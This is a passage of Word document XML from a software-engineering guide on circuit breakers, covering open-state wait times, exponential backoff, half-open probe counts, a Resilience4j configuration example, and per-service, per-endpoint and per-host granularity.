        <w:t>Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A11F5E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>What's the expected recovery time of the downstream?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3D3037" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If it's a database connection pool exhaustion: 10–30 seconds to drain and reconnect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6F8A5F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If it's a full service restart: 30–120 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451C1090" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If it's a network issue being investigated: minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B44B0A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF9998" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Start with 30 seconds for most services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA449B1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Reduce to 10–15 seconds for services you expect to auto-recover quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FABCD50" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Increase to 60+ seconds for services with slow recovery (cold starts, large caches to rebuild).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF050E1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exponential backoff on repeated failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B80E8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>If the half-open probe fails repeatedly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D34D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9055E6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>1st open: wait 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C2AD3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>2nd open: wait 60 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5243CB6D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>3rd open: wait 120 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDFE839" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>4th open: wait 240 seconds (cap at 300 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC7B17" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Each time the half-open probe fails, the wait duration increases. This prevents hammering a deeply-broken service with frequent probes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626B1DE2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.4 Permitted Calls in Half-Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426662F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> How many requests are allowed through in half-open state to test recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEF3482" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Too few (1 request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBE4175" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Not statistically significant. One lucky success doesn't mean recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E20470" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>One unlucky failure keeps the circuit open despite the downstream being mostly healthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D11BD8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Too many (100 requests):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16262189" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the downstream is still broken, you've just sent 100 requests that will all fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE1461B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Increases load on a still-struggling service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B62A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Essentially defeats the purpose of the circuit breaker for those 100 requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3713BF1D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> 3–10 requests. Enough for statistical confidence, not enough to overload a recovering service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B978259" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.5 Configuration Example (Resilience4j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E703665" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>YAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E3A505" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>resilience4j.circuitbreaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553E92F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  instances:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C993259" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    paymentService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D5CA4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      failure-rate-threshold: 50          # Open if 50% fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7347F763" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      slow-call-rate-threshold: 80        # Open if 80% are slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA7BE4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      slow-call-duration-threshold: 3s    # "Slow" = &gt; 3 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F951A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      sliding-window-type: TIME_BASED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0527AD90" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      sliding-window-size: 30             # 30-second window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A19BF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      minimum-number-of-calls: 10         # Need at least 10 calls to evaluate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FA8EB5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      wait-duration-in-open-state: 30s    # Stay open for 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284199EF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      permitted-number-of-calls-in-half-open-state: 5  # Allow 5 probes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BB3A1E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      automatic-transition-from-open-to-half-open: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B177FF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      record-exceptions:                  # These count as failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07556F72" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        - java.io.IOException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A11AEA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        - java.util.concurrent.TimeoutException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06926D2F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      ignore-exceptions:                  # These don't count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A736663" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        - com.example.BusinessException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782BB449" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="47A455BB">
          <v:rect id="_x0000_i4249" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB049EF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Circuit Breaker Granularity — What to Wrap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69112193" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 Per-Service Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5141F6BE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>One circuit breaker for all calls to a given service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA3B7E7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D313CD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>All requests to PaymentService → [Single Circuit Breaker] → PaymentService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAB751E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B8CAFB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The entire service is likely to be healthy or unhealthy as a unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4FB2CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>All endpoints have similar failure characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358B8ECF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Simpler to configure and reason about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F26C59" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> If ONE endpoint is failing but others are fine, the circuit trips for ALL calls to that service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00336150" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>/payments/process is broken (database issue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E28D868" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>/payments/status is fine (read from cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1002FD47" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>A single circuit breaker blocks both → unnecessarily degrades status checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB5971" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 Per-Endpoint Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77633D48" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Separate circuit breakers for different endpoints/operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3532EF50" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E13A926" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>POST /payments/process → [Circuit Breaker A] → PaymentService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534D15E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>GET /payments/status   → [Circuit Breaker B] → PaymentService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D5B56" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>GET /payments/history  → [Circuit Breaker C] → PaymentService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B5E315" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD58B9A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Different endpoints have different failure modes (one calls DB, another calls cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545946CB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>You want fine-grained control (trip only the broken operation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFDCE42" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The cost is more circuit breaker instances to manage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DEA520" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Per-Host Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66718CDF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Separate circuit breakers per backend instance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D363575" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AD994E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>PaymentService instance 1 (10.0.1.5) → [Circuit Breaker 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF09F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>PaymentService instance 2 (10.0.1.6) → [Circuit Breaker 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588E579E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>PaymentService instance 3 (10.0.1.7) → [Circuit Breaker 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C43125" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9E5618" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Individual instances can fail independently (hardware issue, GC pause, bad deployment on one instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1159C803" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>You don't want one bad instance to block traffic to all healthy instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5AE725" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Common in service mesh implementations (Envoy tracks per-host circuit breaking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066237EF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Envoy implements per-host circuit breaking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010875DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>YAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E4EF1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>outlier_detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20473B1C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
